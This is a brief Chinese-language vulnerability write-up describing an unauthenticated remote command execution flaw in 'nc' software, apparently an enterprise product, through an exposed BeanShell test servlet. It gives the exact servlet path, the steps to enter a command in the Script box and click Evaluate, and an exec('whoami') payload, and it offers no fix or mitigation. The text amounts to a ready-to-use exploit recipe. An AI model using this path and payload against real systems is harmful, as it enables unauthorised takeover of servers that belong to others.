nc存在一个未授权的页面,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。
漏洞地址
http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet
在Script框输入要执行的命令,点击Evaluate即可
exec("whoami")
